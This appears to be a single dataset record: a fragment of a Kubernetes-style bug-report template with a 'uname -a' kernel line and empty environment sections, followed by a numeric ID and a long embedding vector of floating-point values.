uname -a Linux pamutil46-32 6.1.73+pam01 #1 SMP PREEMPT_DYNAMIC Thu Jan 18 10:16:13 PST 2024 x86_64 GNU/Linux ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> </details> --- end body ---
3,299
[ -0.009051848202943802, -0.002518315799534321, -0.008896875195205212, -0.016920264810323715, 0.00879825558513403, -0.01551141683012247, -0.014891523867845535, 0.026542697101831436, 0.011883633211255074, -0.023682735860347748, 0.0006533532869070768, -0.02426036261022091, -0.043167103081941605, 0.0042335884645581245, 0.003969429526478052, 0.009432237595319748, -0.028515083715319633, 0.032009027898311615, -0.02947309985756874, 0.004744295962154865, 0.006318683270365, 0.02435898222029209, -0.025133848190307617, 0.06463794410228729, 0.021189074963331223, 0.01149620022624731, 0.004367428831756115, -0.0026151740457862616, -0.025260645896196365, -0.008551707491278648, 0.02311919629573822, 0.0124894380569458, -0.012362641282379627, 0.04060300067067146, 0.03798254206776619, -0.0029726694338023663, -0.0009007821790874004, 0.047759946435689926, -0.008763034828007221, -0.025176113471388817, -0.0777120590209961, -0.07838830351829529, 0.006427869200706482, 0.031220072880387306, -0.03305157646536827, 0.015074674040079117, -0.016737114638090134, -0.010510005988180637, -0.059678804129362106, -0.02289378084242344, -0.019737960770726204, -0.02576783113181591, -0.011362358927726746, -0.03454495221376419, 0.030121169984340668, -0.027458447962999344, 0.009101158007979393, 0.010242325253784657, -0.033023398369550705, 0.00384967727586627, -0.015863629058003426, 0.011721615679562092, -0.007889549247920513, 0.01980840414762497, -0.006794169545173645, -0.027247121557593346, -0.006427869200706482, -0.009516768157482147, -0.059678804129362106, 0.0027507757768034935, -0.012517614290118217, 0.000498379988130182, -0.0021044667810201645, 0.023936327546834946, 0.06289097666740417, -0.045026782900094986, 0.019554810598492622, 0.046294745057821274, -0.022090736776590347, -0.00574457785114646, -0.02704988233745098, -0.005191605072468519, -0.015412797220051289, -0.02386588603258133, 0.004437871277332306, -0.009002539329230785, 0.006205975543707609, -0.05297268554568291, -0.030318409204483032, 0.029670339077711105, -0.03547479212284088, -0.014722461812198162, 0.008086787536740303, -0.03299522027373314, 0.021513110026717186, 0.019118066877126694, -0.020752331241965294, -0.0038038897328078747, -0.0404057614505291, 0.00686108972877264, -0.05359257757663727, 0.02320372685790062, -0.008248805068433285, 0.013207950629293919, 0.03071288764476776, 0.020132439211010933, 0.003587279235944152, 0.007579602301120758, -0.012602145783603191, 0.08227672427892685, -0.012912091799080372, -0.026782201603055, -0.0267399363219738, -0.012235845439136028, -0.03257256746292114, 0.03885602951049805, 0.005205693654716015, -0.014018038287758827, -0.04871796444058418, 0.027768393978476524, -0.011320093646645546, 0.004617499187588692, -0.028500996530056, -0.04725276306271553, -0.011460978537797928, -0.0027613420970737934, -0.022203445434570312, 0.003789801150560379, 0.004923923872411251, -0.039335038512945175, 0.00988306850194931, -0.018808120861649513, -0.011277828365564346, -0.021386312320828438, 0.04212455451488495, 0.03040293976664543, -0.013581294566392899, 0.009826715104281902, -0.02537335269153118, -0.026669492945075035, -0.01583545096218586, -0.05601579695940018, 0.005033109802752733, 0.003550297114998102, 0.002266484312713146, 0.010756555013358593, 0.03212173655629158, 0.029106799513101578, -0.004599888809025288, 0.027852926403284073, -0.00881938822567463, -0.04195549339056015, 0.020216969773173332, 0.011207385919988155, 0.08458723872900009, 0.008192451670765877, -0.00964356493204832, 0.0031047489028424025, 0.0337841771543026, 0.003502748440951109, 0.0053184013813734055, -0.030149348080158234, -0.029980286955833435, -0.0017584183951839805, 0.00776275247335434, 0.029106799513101578, -0.03234715014696121, 0.012256978079676628, -0.04139195382595062, 0.02717667818069458, -0.00285115628503263, 0.007967035286128521, 0.03471401706337929, -0.029050447046756744, -0.04125107079744339, 0.009608343243598938, -0.023837707936763763, 0.05300086364150047, 0.04220908507704735, -0.002203086158260703, -0.02448577806353569, 0.002368625719100237, -0.023457320407032967, -0.019357571378350258, 0.03632010146975517, 0.01628628373146057, -0.0235136728733778, -0.0071675144135952, 0.01147506758570671, -0.022048471495509148, -0.001146450056694448, 0.020231056958436966, -0.0006797691457904875, -0.0015506133204326034, -0.008150185458362103, 0.006603975314646959, -0.013116375543177128, -0.00048164991312660277, 0.021766701713204384, -0.015412797220051289, 0.005121162626892328, -0.005163427907973528, -0.00526204751804471, -0.015567771159112453, -0.04871796444058418, 0.04147648438811302, -0.006773036904633045, 0.03572838753461838, 0.01954072155058384, -0.030233878642320633, -0.02038603089749813, -0.006892789155244827, 0.05164836719632149, 0.005321923643350601, 0.03350240737199783, 0.024274451658129692, -0.010967882350087166, 0.0050577642396092415, -0.04840801656246185, 0.0023210770450532436, 0.022527480497956276, -0.025133848190307617, -0.004606932867318392, 0.024274451658129692, -0.05449424311518669, -0.008410822600126266, -0.005984081886708736, -0.07557060569524765, -0.024640752002596855, -0.009650609456002712, 0.04077206179499626, -0.02581009641289711, -0.002336926758289337, -0.008171318098902702, 0.019216686487197876, -0.01270780898630619, -0.05094394460320473, -0.015215558931231499, -0.007283744402229786, 0.01446886919438839, 0.014187099412083626, -0.006072135176509619, -0.02316146157681942, -0.03229079768061638, -0.0071182046085596085, -0.012651455588638783, 0.00977036077529192, -0.001429980737157166, 0.024499867111444473, 0.0053782775066792965, -0.037926189601421356, -0.010418430902063847, 0.0011640606680884957, 0.0002542530419304967, 0.012876871041953564, -0.036686401814222336, -0.002153776353225112, 0.0134967640042305, 0.02187941037118435, -0.006632152013480663, 0.03939139097929001, 0.01856861636042595, -0.010115528479218483, 0.015736833214759827, 0.00961538776755333, -0.0634545162320137, -0.03299522027373314, 0.0436742901802063, -0.005645958241075277, -0.003428783966228366, 0.010756555013358593, -0.028698233887553215, -0.03978586941957474, 0.019554810598492622, 0.03533390909433365, -0.00014396665210369974, -0.0055543831549584866, -0.004134968854486942, 0.016258105635643005, -0.005948860663920641, -0.011679350398480892, -0.0011156315449625254, 0.0001949273282662034, 0.019484369084239006, -0.023105107247829437, -0.006519444286823273, 0.026796288788318634, -0.03079741820693016, -0.034037768840789795, -0.020569181069731712, -0.011820235289633274, -0.012602145783603191, 0.022795161232352257, 0.007220346014946699, -0.005924205761402845, 0.005487462971359491, -0.018963094800710678, -2.235720728549495e-7, 0.016920264810323715, 0.04336434230208397, -0.02457031048834324, 0.016089044511318207, -0.007558469660580158, 0.010904483497142792, -0.04590027034282684, 0.016469433903694153, -0.004448437597602606, -0.001502184197306633, -0.011327138170599937, -0.016215840354561806, 0.01579318568110466, -0.0050577642396092415, -0.026190483942627907, -0.04280080273747444, 0.01436320599168539, -0.010242325253784657, 0.04474501311779022, -0.017920546233654022, -0.011334182694554329, -0.002778952708467841, 0.02907862327992916, -0.012898003682494164, -0.026444077491760254, 0.0015955204144120216, 0.019667519256472588, -0.05052129179239273, -0.025598768144845963, 0.0031892796978354454, -0.003014934714883566, -0.06384899467229843, -0.03417865186929703, -0.0031857576686888933, -0.014595665968954563, -0.01856861636042595, -0.02369682304561138, -0.06570867449045181, -0.01852635107934475, 0.016314459964632988, 0.027035793289542198, -0.018906740471720695, -0.002019935753196478, 0.02192167565226555, 0.00012525539204943925, -0.005758666433393955, 0.024457601830363274, -0.044322360306978226, -0.00489574670791626, 0.04150466248393059, 0.012404906563460827, 0.010672023519873619, 0.0008131694630719721, 0.04060300067067146, -0.01160186342895031, -0.01892082951962948, 0.024781636893749237, -0.031783610582351685, -0.02527473308146, -0.008347424678504467, 0.025669211521744728, -0.017878280952572823, 0.002648634370416403, -0.04446324333548546, -0.008086787536740303, 0.02726120874285698, 0.033643290400505066, 0.008122009225189686, 0.02051282674074173, -0.003631305880844593, -0.03105100989341736, -0.033023398369550705, -0.01597633585333824, 0.010812908411026001, -0.0003268967557232827, 0.03499578684568405, -0.007509159855544567, -0.009192733094096184, -0.024640752002596855, -0.017441539093852043, -0.061482127755880356, 0.01703297346830368, -0.017004795372486115, -0.008706680499017239, -0.02647225372493267, -0.023316435515880585, 0.02938856929540634, 0.03144548833370209, 0.0008787689730525017, 0.04494225233793259, 0.03570020943880081, 0.022513391450047493, -0.02986757829785347, 0.03510849177837372, -0.024936610832810402, -0.004406172316521406, -0.028036076575517654, 0.021034101024270058, -0.0025165549013763666, -0.03795436769723892, 0.011925898492336273, -0.013595383614301682, 0.02986757829785347, 0.012623278424143791, -0.007480983156710863, 0.008572840131819248, -0.033192459493875504, 0.005121162626892328, -0.05156383663415909, -0.0065124002285301685, 0.0072766998782753944, 0.01587771810591221, 0.01248239353299141, 0.013665826059877872, -0.013426321558654308, 0.017836015671491623, 0.0439278818666935, 0.053846172988414764, 0.040349408984184265, 0.01825867034494877, 0.01852635107934475, 0.02237250655889511, 0.020935481414198875, 0.010777687653899193, -0.011214430443942547, 0.008530574850738049, 0.03417865186929703, 0.009312485344707966, -0.002782474970445037, 0.03533390909433365, 0.05483236536383629, -0.029275862500071526, -0.0629473328590393, -0.008284026756882668, 0.019512545317411423, -0.014595665968954563, -0.01166526135057211, -0.008241760544478893, -0.003020217875018716, -0.011763880960643291, 0.007734575774520636, 0.008403778076171875, -0.03296704217791557, -0.04147648438811302, -0.01866723597049713, -0.0003656400949694216, -0.023626381531357765, 0.018343200907111168, -0.04897155612707138, -0.00006675517943222076, -0.029191331937909126, -0.007195691112428904, -0.02020288072526455, 0.010256413370370865, -0.034432247281074524, -0.007488027215003967, 0.0016157726058736444, -0.002342209918424487, 0.007755708415061235, -0.00864328257739544, 0.0336151123046875, -0.007163992151618004, -0.009904202073812485, -0.012433083727955818, 0.027768393978476524, 0.03750353306531906, 0.05426882579922676, -0.013531985692679882, -0.007075939327478409, -0.03237532824277878, 0.020850950852036476, -0.011932943016290665, 0.026683581992983818, 0.01999155431985855, 0.04319528117775917, 0.013736268505454063, -0.013250215910375118, 0.012052695266902447, -0.018949005752801895, -0.03265709802508354, 0.01579318568110466, -0.010101440362632275, 0.0012485915794968605, -0.03930686041712761, 0.012623278424143791, 0.03358693793416023, 0.010228237137198448, -0.029332216829061508, 0.031783610582351685, 0.010869262740015984, -0.016511699184775352, 0.010559315793216228, 0.03017752431333065, -0.03493943065404892, -0.017004795372486115, -0.043167103081941605, 0.027148501947522163, 0.03485490009188652, 0.028557348996400833, -0.03485490009188652, 0.03305157646536827, -0.0007215943769551814, -0.01570865511894226, 0.0025218380615115166, 0.00034604829852469265, -0.012447172775864601, -0.027331652119755745, -0.022569745779037476, 0.0002183714386774227, 0.0253592636436224, -0.03609468787908554, -0.006804735865443945, -0.01241899561136961, -0.015891805291175842, -0.0007819106685929, -0.0126162339001894, 0.004726685117930174, -0.007692310027778149, 0.00036101730074733496, 0.012827561236917973, 0.016300370916724205, 0.014123701490461826, -0.0013278392143547535, -0.03057200275361538, 0.018540440127253532, 0.02633136883378029, -0.005681179463863373, -0.0028423508629202843, 0.040969301015138626, -0.027063971385359764, -0.05280362442135811, -0.0062623294070363045, 0.008875742554664612, 0.006100311875343323, -0.014208232052624226, 0.011961120180785656, -0.011799102649092674, 0.0011684633791446686, -0.008340380154550076, -0.02562694624066353, -0.013144551776349545, -0.003353058360517025, 0.021414490416646004, 0.05139477550983429, -0.03620739281177521, -0.023415055125951767, -0.03265709802508354, -0.0033706689719110727, -0.022640187293291092, 0.02771204151213169, 0.008410822600126266, 0.0015620602061972022, 0.024429425597190857, -0.02417583204805851, 0.004370951093733311, 0.029275862500071526, -0.019202599301934242, -0.038095250725746155, -0.011348270811140537, 0.0234291423112154, 0.004089181311428547, -0.04080023989081383, -0.017314741387963295, -0.01976613700389862, 0.02893773838877678, -0.008939140476286411, -0.007664133328944445, -0.026063688099384308, -0.0028176959604024887, -0.014419559389352798, 0.006568754091858864, -0.018385466188192368, -0.002141448901966214, -0.015116939321160316, -0.011348270811140537, -0.010960837826132774, -0.03595380112528801, 0.0010953793535009027, 0.036686401814222336, -0.012278110720217228, 0.000014026568351255264, -0.022781072184443474, 0.014891523867845535, 0.028388287872076035, -0.017441539093852043, 0.020611446350812912, 0.007354186847805977, -0.017610600218176842, -0.00442378269508481, -0.006216541863977909, -0.008284026756882668, 0.00867145974189043, 0.014961966313421726, -0.014187099412083626, -0.012609190307557583, 0.012609190307557583, 0.04561850056052208, 0.00485348142683506, -0.019864756613969803, 0.02395041659474373, 0.04187096282839775, -0.011024235747754574, -0.01852635107934475, 0.027472537010908127, 0.0021009445190429688, -0.0034833766985684633, -0.004737251438200474, 0.041138362139463425, -0.01777966134250164, 0.0216680821031332, -0.011369403451681137, 0.00042111348011530936, 0.0022488737013190985, -0.021118631586432457, 0.01606086827814579, -0.023358700796961784, -0.015201469883322716, 0.015638213604688644, 0.007121726870536804, 0.01151733286678791, 0.020456474274396896, -0.0019054670119658113, -0.007628912106156349, -0.030600178986787796, 0.01897718384861946, -0.013665826059877872, -0.01363060437142849, -0.01074246596544981, 0.01453931163996458, -0.027726128697395325, -0.007558469660580158, -0.0011059456737712026, -0.03987039998173714, -0.0008087668102234602, -0.054945074021816254, -0.014278674498200417, 0.01148915570229292, 0.01067906804382801, -0.03806707262992859, -0.0022312630899250507, -0.014821081422269344, -0.01618766412138939, -0.011129899881780148, 0.002731404034420848, -0.022386595606803894, 0.03276980668306351, -0.03750353306531906, 0.010249369777739048, -0.031699080020189285, 0.02492252178490162, -0.014349116943776608, 0.01892082951962948, 0.01637081429362297, 0.01711750403046608, -0.008960273116827011, 0.021823056042194366, -0.001288215396925807, -0.0007083864184096456, -0.017216123640537262, -0.0014924983261153102, -0.010418430902063847, -0.01230628788471222, -0.03601015731692314, 0.013813754543662071, -0.0011341226054355502, -0.03384052962064743, 0.013179773464798927, 0.010897439904510975, 0.0023245993070304394, -0.031248249113559723, -0.01879403181374073, 0.06621585786342621, 0.0067695146426558495, -0.022738806903362274, 0.00035023080999962986, -0.00022123316011857241, 0.01711750403046608, 0.0062517630867660046, 0.009227954782545567, 0.021287694573402405, -0.023879973217844963, -0.010707245208323002, -0.009326574392616749, 0.010256413370370865, -0.026415901258587837, 0.003655960550531745, 0.0044519598595798016, 0.006399692036211491, -0.0253169983625412, 0.008875742554664612, -0.008805300109088421, 0.012735986150801182, -0.001935404958203435, -0.026711758226156235, 0.01763877645134926, -0.01583545096218586, -0.0019089890411123633, 0.0015937592834234238, -0.006998452357947826, -0.014764727093279362, 0.0015347638400271535, -0.0039553409442305565, -0.021696260198950768, -0.01436320599168539, 0.0005807095440104604, 0.004349818453192711, 0.005233870353549719, 0.009988732635974884, 0.018723590299487114, 0.007093549706041813, -0.01566638983786106, 0.023499585688114166, -0.009467458352446556, -0.03144548833370209, 0.02113272063434124, 0.013827843591570854, -0.00851648673415184, 0.022485215216875076, -0.006773036904633045, 0.012743030674755573, -0.03620739281177521, -0.005219781771302223, 0.018949005752801895, -0.005311356857419014, -0.021653994917869568, 0.006505355704575777, 0.031079187989234924, -0.0019864756613969803, 0.0336151123046875, -0.004920401610434055, -0.014708373695611954, 0.012468305416405201, -0.01575092040002346, -0.00864328257739544, -0.009798537939786911, 0.007650044746696949, -0.02206256054341793, -0.006424346938729286, 0.02059735730290413, -0.0029004658572375774, 0.012299243360757828, -0.003206890309229493, 0.009946467354893684, -0.018991271033883095, -0.012996623292565346, 0.007424629293382168, -0.008241760544478893, 0.001353374682366848, -0.00981967058032751, 0.0125951012596488, 0.020357854664325714, -0.001354255131445825, -0.0004781277966685593, -0.00583615293726325, 0.004039871506392956, -0.024992963299155235, -0.029360393062233925, 0.010791775770485401, 0.021062277257442474, 0.007054806686937809, 0.0125105706974864, 0.016215840354561806, 0.0006938576698303223, 0.02003381960093975, -0.0335305817425251, 0.007480983156710863, 0.035841092467308044, 0.016779379919171333, -0.013517896644771099, 0.005719922948628664, 0.01699070632457733, 0.009326574392616749, -0.006086223293095827, 0.03181178867816925, -0.03899691253900528, -0.020710065960884094, 0.006135533098131418, 0.0022365462500602007, -0.06210201978683472, -0.015497328713536263, -0.007558469660580158, 0.048295311629772186, -0.03057200275361538, -0.018582705408334732, -0.006501833442598581, 0.008861654438078403, -0.010143705643713474, -0.011763880960643291, 0.01552550494670868, 0.01142575778067112, 0.042237263172864914, -0.008347424678504467, -0.04170190170407295, 0.003782756859436631, 0.02810651808977127, -0.026542697101831436, 0.049478743225336075, -0.043223459273576736, -0.012517614290118217, -0.025739653035998344, 0.010080307722091675, 0.008079743012785912, -0.027416182681918144, -0.011291916482150555, -0.015919983386993408, -0.004779516719281673, 0.0038426329847425222, 0.013792621903121471, -0.03823613375425339, -0.021907586604356766, -0.008530574850738049, -0.0018860952695831656, 0.005008454900234938, 0.011024235747754574, -0.005575516261160374, -0.0027419705875217915, 0.026613138616085052, -0.034347716718912125, 0.004131447058171034, 0.005328967701643705, -0.01663849502801895, 0.024950698018074036, 0.0006489506340585649, 0.020921392366290092, 0.009995777159929276, 0.04564667493104935, 0.011707527562975883, 0.018512263894081116, 0.0020357854664325714, -0.007945902645587921, 0.008030434139072895, -0.018934916704893112, -0.007530292496085167, 0.003965907264500856, 0.0005071852938272059, -0.03251621127128601, -0.0507185272872448, 0.015145116485655308, 0.03398141264915466, -0.008988450281322002, 0.004191322717815638, 0.025345176458358765, 0.018808120861649513, -0.011411668732762337, -0.06717387586832047, -0.007121726870536804, 0.0056248256005346775, -0.013045933097600937, -0.050267696380615234, -0.001289095962420106, -0.028965914621949196, 0.04156101867556572, 0.01746971532702446, -0.023020576685667038, 0.02065371163189411, 0.019907021895051003, -0.0031153152231127024, -0.022781072184443474, 0.003504509571939707, -0.0125951012596488, 0.0008602778543718159, -0.00879825558513403, 0.030205702409148216, -0.0026046077255159616, -0.014497046358883381, -0.024683017283678055, 0.009777405299246311, -0.022879691794514656, 0.0035291642416268587, -0.016074955463409424, -0.004110313951969147, -0.009199777618050575, -0.028388287872076035, -0.013996904715895653, 0.026810377836227417, 0.003916597459465265, -0.013186817988753319, 0.010756555013358593, 0.0020128916949033737, -0.028346022590994835, -0.028247402980923653, 0.005205693654716015, 0.011122855357825756, 0.016934353858232498, -0.009756272658705711, 0.01067906804382801, 0.018019165843725204, -0.008748946711421013, 0.031783610582351685, -0.0046210214495658875, 0.019075801596045494, -0.01624401845037937, -0.0044026500545442104, -0.010207103565335274, -0.012764163315296173, -0.03243168070912361, 0.014109613373875618, 0.03727811947464943, -0.020794596523046494, -0.02421809732913971, -0.020442385226488113, -0.03462948277592659, -0.009657653048634529, -0.0006458687712438405, 0.02042829617857933, -0.03874332085251808, 0.01266554370522499, -0.039729513227939606, 0.017807839438319206, 0.0013868347741663456, -0.002148493193089962, -0.015722744166851044, 0.012827561236917973, -0.01158073078840971, 0.007537337020039558, 0.017230210825800896, -0.04099747911095619, -0.00002043104723270517, -0.05215555429458618, 0.019653430208563805, 0.008058610372245312, 0.038715142756700516, -0.007910681888461113, 0.03136095777153969, 0.00614257762208581, 0.010284590534865856, 0.018413644284009933, 0.006248240824788809, 0.0007449283730238676, 0.017582423985004425, -0.024119477719068527, -0.0043322076089680195, 0.014933789148926735, 0.00798816792666912, -0.011883633211255074, -0.01365173701196909, 0.005807975772768259, -0.0400676392018795, -0.04891520366072655, 0.025514237582683563, 0.010185970924794674, -0.06463794410228729, 0.02827557921409607, 0.004494225140661001, 0.005607215221971273, -0.05094394460320473, 0.027275297790765762, 0.015934070572257042, 0.024767547845840454, 0.002072767587378621, -0.01861088164150715, -0.005114118568599224, 0.014243453741073608, 0.021456755697727203, 0.014947877265512943, -0.03105100989341736, -0.01848408579826355, -0.01813187450170517, -0.022442949935793877, 0.0027331651654094458, 0.013264304026961327, -0.015469151549041271, -0.019963376224040985, -0.0016087283147498965, 0.013531985692679882, 0.00006829611083958298, 0.009284308180212975, -0.010376165620982647, -0.0008048044401220977, 0.019244864583015442, 0.0037017480935901403, -0.0029550588224083185, 0.03136095777153969, 0.006963231600821018, 0.030064817517995834, 0.010911528021097183, -0.008502397686243057, -0.029332216829061508, -0.008453087881207466, -0.0016950202407315373, -0.01941392570734024, -0.015680478885769844, -0.008185407146811485, -0.013623560778796673, 0.006198931485414505, -0.0006066851783543825, 0.013877153396606445, -0.020977746695280075, 0.0048710922710597515, -0.0018455908866599202, -0.0071569480933249, 0.005991126410663128, 0.0168498232960701, -0.013736268505454063, -0.010418430902063847, -0.04404059052467346, 0.018596794456243515, -0.012996623292565346, 0.04178643226623535, 0.01765286549925804, -0.0007264372543431818, -0.02426036261022091, -0.020442385226488113, -0.0037651462480425835, 0.023710912093520164, 0.024020858108997345, 0.036686401814222336, 0.00865032710134983, 0.01906171441078186, 0.0336151123046875, 0.0034763324074447155, -0.024640752002596855, -0.0078050182200968266, -0.0018050865037366748, 0.024499867111444473, 0.0038250223733484745, -0.030121169984340668, -0.007473938632756472, -0.0023862363304942846, -0.021555375307798386, -0.03674275800585747, 0.012299243360757828, -0.016948441043496132, 0.03539026156067848, -0.053367163985967636, 0.00024434708757326007, -0.015201469883322716, 0.018202316015958786, -0.042688094079494476, -0.005078897345811129, 0.007565513718873262, -0.02028741128742695, -0.016652584075927734, -0.003715836675837636, 0.015779098495841026, -0.01060862559825182, -0.007114682346582413, 0.004702030215412378, -0.0008787689730525017, -0.054325178265571594, -0.026021422818303108, 0.008467176929116249, 0.029980286955833435, 0.008918007835745811, -0.03795436769723892, -0.0017681042663753033, -0.021738525480031967, -0.0032368283718824387, -0.007340098265558481, 0.022865602746605873, -0.003513314761221409, -0.024373071268200874, -0.016708938404917717, -0.004437871277332306, 0.015722744166851044, -0.03539026156067848, 0.006146099418401718, -0.006822346709668636, -0.024020858108997345, -0.016441255807876587, 0.013440410606563091, -0.007128770928829908, -0.0005547339096665382, -0.011679350398480892, -0.008953229524195194, -0.002141448901966214, -0.011749792844057083, 0.015652300789952278, -0.0038250223733484745, 0.01140462514013052, -0.014835169538855553, -0.01949845626950264, 0.0011649412335827947, 0.017483804374933243, 0.0021713869646191597, -0.008326292037963867, 0.028247402980923653, 0.002363342558965087, 0.009699918329715729, -0.01072133332490921, -0.02258383296430111, 0.014976054430007935, -0.029444923624396324, 0.011911810375750065, -0.003569668624550104, -0.007195691112428904, -0.043392520397901535, -0.015300089493393898, -0.021231340244412422, -0.00048297070316039026, -0.001571746077388525, 0.00953085720539093, -0.02254156768321991, 0.006431391462683678, -0.02837419882416725, 0.003726402996107936, 0.008572840131819248, -0.029360393062233925, -0.013785578310489655, 0.07089323550462723, 0.014440692029893398, -0.002793041290715337, 0.014905611984431744, -0.021682171151041985, -0.025133848190307617, 0.044096942991018295, 0.00968583021312952, 0.025950981304049492, 0.0037334472872316837, 0.02280925028026104, -0.013236126862466335, 0.024034947156906128, 0.013729223981499672, -0.011010147631168365, 0.020188791677355766, -0.012961401604115963, 0.01052409503608942, 0.02034376561641693, 0.005501551553606987, -0.009037760086357594, 0.0249788761138916, 0.004881658591330051, 0.011151032522320747, 0.010946748778223991, -0.007769796997308731, -0.0032967044971883297, 0.010925616137683392, 0.010080307722091675, -0.008875742554664612, -0.020681889727711678, -0.02978304773569107, 0.0016668433090671897, -0.021160896867513657, 0.01597633585333824, 0.026993528008461, -0.0034657660871744156, -0.004142013378441334, 0.003337208880111575, 0.0009122291230596602, -0.016835734248161316, 0.004575233906507492, 0.018343200907111168, 0.04567485302686691, -0.01583545096218586, -0.03206538036465645, -0.010263457894325256, 0.010425475426018238, -0.003782756859436631, 0.005321923643350601, -0.01759651117026806, -0.0332769900560379, -0.0035573411732912064, 0.005980560090392828, -0.013870108872652054, -0.006427869200706482, 0.004395605996251106, 0.01158073078840971, 0.0038919427897781134, -0.027331652119755745, -0.00726965581998229, -0.0005925967125222087, -0.0062975506298244, 0.006220064125955105, -0.0018209361005574465, -0.005255002994090319, -0.011770925484597683, -0.008495353162288666, -0.024556221440434456, 0.013137508183717728, 0.023344611749053, 0.006072135176509619, -0.019357571378350258, 0.004110313951969147, -0.007819106802344322, 0.008706680499017239, 0.001149972202256322, -0.005677657667547464, 0.0030307844281196594, -0.03150184080004692, 0.004930967930704355, 0.011115810833871365, -0.0022911392152309418, 0.02748662419617176, -0.014835169538855553, 0.007424629293382168, -0.014025081880390644, 0.0004376234137453139, 0.022245710715651512, -0.0024936608970165253, -0.017582423985004425, 0.01579318568110466, 0.015215558931231499, 0.005078897345811129, 0.006677939556539059, 0.012538747861981392, -0.003648916492238641, 0.017089325934648514, 0.011242607608437538, -0.030741063877940178, 0.02223162166774273, 0.00772048719227314, 0.0076852659694850445, -0.0018455908866599202, -0.007121726870536804, 0.011947031132876873, 0.017948724329471588, 0.00000738819699108717, 0.003726402996107936, 0.009326574392616749, -0.03530573099851608, 0.013961683958768845, 0.025824183598160744, -0.0070477621629834175, -0.01446886919438839, 0.006463090423494577, 0.019695695489645004, 0.020541004836559296, 0.009805582463741302, -0.006980841979384422, -0.03939139097929001, -0.0008818508358672261, 0.020104261115193367, -0.02299240045249462, 0.025443796068429947, -0.02717667818069458, -0.010002820752561092, -0.025781918317079544, 0.024781636893749237, 0.03539026156067848, 0.00106456084176898, 0.0022506348323076963, 0.012841649353504181, 0.03195267170667648, -0.014025081880390644, -0.0037017480935901403, -0.004293464589864016, 0.01270780898630619, 0.0018860952695831656, 0.009094114415347576, -0.016652584075927734, 0.019047625362873077, -0.013426321558654308, 0.005818542558699846, -0.014377294108271599, -0.02655678614974022, -0.039814043790102005, -0.009298397228121758, 0.00387080991640687, -0.008086787536740303, -0.014849258586764336, -0.002801846479997039, -0.0015990425599738955, -0.002715554554015398, -0.008530574850738049, 0.0030272621661424637, 0.012059738859534264, 0.0071675144135952, 0.002576430793851614, 0.009967599995434284, 0.017850104719400406, -0.0008026030845940113, 0.03460130840539932, 0.016948441043496132, 0.0010900961933657527, 0.004194844979792833, 0.009284308180212975, -0.06582137942314148, -0.030543824657797813, -0.006470134481787682, 0.012179491110146046, -0.014306851662695408, -0.004747817758470774, 0.022133002057671547, 0.026134131476283073, 0.017187945544719696, 0.017723308876156807, -0.009467458352446556, 0.007516204379498959, -0.0020991836208850145, -0.02400677092373371, -0.030121169984340668, 0.0029656251426786184, 0.0032526778522878885, 0.004223022144287825, 0.009876024909317493, -0.011770925484597683, -0.008903919719159603, -0.01065089087933302, -0.011869545094668865, -0.012426039204001427, 0.04404059052467346, -0.006984364241361618, 0.00024808934540487826, 0.008248805068433285, 0.030431117862462997, -0.0003412053920328617, 0.003062483388930559, 0.004540012683719397, 0.0003097264270763844, -0.0004479696508497, -0.00875599030405283, 0.0036242615897208452, -0.009974643588066101, 0.01164412871003151, -0.005600170698016882, -0.012764163315296173, -0.00855875201523304, 0.012764163315296173, 0.019597075879573822, 0.011256695725023746, -0.0009747467120178044, -0.0125951012596488, 0.01622992940247059, 0.02249930240213871, 0.0072485231794416904, -0.0039835176430642605, -0.03155819699168205, -0.01844182051718235, 0.0027137934230268, 0.006378559395670891, 0.02651451900601387, 0.007171036675572395, 0.005255002994090319, 0.01532826665788889, -0.0007942380616441369, 0.0008827313431538641, -0.020681889727711678, 0.02369682304561138, 0.011221474967896938, -0.025119761005043983, 0.015638213604688644, -0.002159059513360262, -0.006279940251260996, -0.007340098265558481, 0.005124684888869524, 0.016427168622612953, 0.002284094924107194, 0.02297831140458584, -0.024584397673606873, -0.003427022835239768, 0.01451113447546959, -0.0016008035745471716, -0.01954072155058384, -0.007931814529001713, -0.00029255609842948616, 0.010150750167667866, -0.00855875201523304, -0.015088762156665325, -0.00026173755759373307, 0.010052130557596684, 0.0018121307948604226, 0.015384620055556297, 0.0038355886936187744, -0.013919418677687645, -0.002234785119071603, -0.004525924101471901, -0.0026715281419456005, -0.008276982232928276, -0.03133277967572212, -0.008981405757367611, -0.03440406918525696, -0.009270220063626766, -0.010517050512135029, -0.017540158703923225, -0.009995777159929276, -0.012341508641839027, -0.009777405299246311, -0.013827843591570854, 0.019597075879573822, -0.0009765077847987413, 0.005941816605627537, 0.029529454186558723, -0.012559880502521992, -0.04733729362487793, 0.004050438292324543, 0.023189637809991837, -0.0009227954433299601, 0.0010522333905100822, -0.012912091799080372, 0.019132155925035477, -0.004205411300063133, -0.009481547400355339, -0.03527755290269852, 0.025950981304049492, -0.02100592479109764, -0.012193579226732254, 0.009629475884139538, 0.0005102671566419303, -0.002476050518453121, 0.004388561472296715, 0.014666108414530754, 0.011108766309916973, -0.01901944912970066, -0.0014546356396749616, 0.026852643117308617, -0.003303748555481434, 0.027599332854151726, 0.004790083505213261, -0.014130746014416218, 0.003990562167018652, 0.02231615222990513, 0.030233878642320633, 0.011862500570714474, -0.008410822600126266, -0.00022299423289950937, -0.03710905835032463, -0.021344047039747238, -0.0061637102626264095, -0.017018884420394897, -0.017850104719400406, -0.000862038868945092, -0.019005360081791878, -0.0000924556516110897, -0.0035890403669327497, -0.002983235754072666, 0.013095241971313953, 0.006892789155244827, 0.013975772075355053, -0.019047625362873077, 0.024204008281230927, 0.01148915570229292, 0.009270220063626766, 0.0006229749997146428, -0.0006264970870688558, 0.009735140018165112, 0.01715976931154728, 0.005374755244702101, 0.014553399756550789, -0.0004565548151731491, -0.0073260096833109856, 0.014961966313421726, -0.03203720599412918, 0.015229647047817707, -0.01711750403046608, -0.001998803112655878, -0.014637931250035763, -0.010939705185592175, -0.024274451658129692, -0.004071570932865143, -0.02011835016310215, 0.014327984303236008, 0.010129617527127266, 0.016483521088957787, -0.01363060437142849, -0.012827561236917973, 0.0168920885771513, 0.03181178867816925, -0.011749792844057083, 0.007058328483253717, -0.03181178867816925, 0.018329113721847534, 0.039898574352264404, 0.015497328713536263, -0.008467176929116249, 0.023485496640205383, -0.01048182975500822, 0.003266766434535384, 0.006283462047576904, -0.009622432291507721, -0.021273605525493622, 0.004945056512951851, 0.0010487112449482083, -0.0027507757768034935, 0.01800507865846157, -0.009291352704167366, 0.005741055589169264, 0.013686958700418472, 